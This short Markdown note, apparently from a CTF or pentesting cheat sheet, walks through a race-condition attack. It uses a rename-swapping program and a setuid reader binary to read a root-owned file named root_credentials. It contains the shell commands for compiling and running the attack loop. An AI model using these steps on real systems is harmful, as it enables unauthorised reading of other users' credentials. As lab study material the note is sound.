23 lines
656 B
Markdown
23 lines
656 B
Markdown
# Racing Conditions
|
|
|
|
## Read files from another user
|
|
|
|
* The file of interest needs to be opened by a process which is a suid binary (here named `read_reds`) and creates a file descriptor to it
|
|
* The file of intereset is called `root_credentials` and is owned by root
|
|
* Create a file
|
|
```sh
|
|
touch yo
|
|
```
|
|
* Compile `gistfile.txt` from [live overflow's repo](https://gist.github.com/LiveOverflow/590edaf5cf3adeea31c73e303692dec0)
|
|
```sh
|
|
gcc gistfile.c -o rename_file
|
|
```
|
|
* Inside session 1 start the binary
|
|
```sh
|
|
./rename_file yo root_credentials
|
|
```
|
|
* Inside session to try to read `root_credentials` until it succeeds
|
|
```sh
|
|
./read_creds root_credentials
|
|
```
|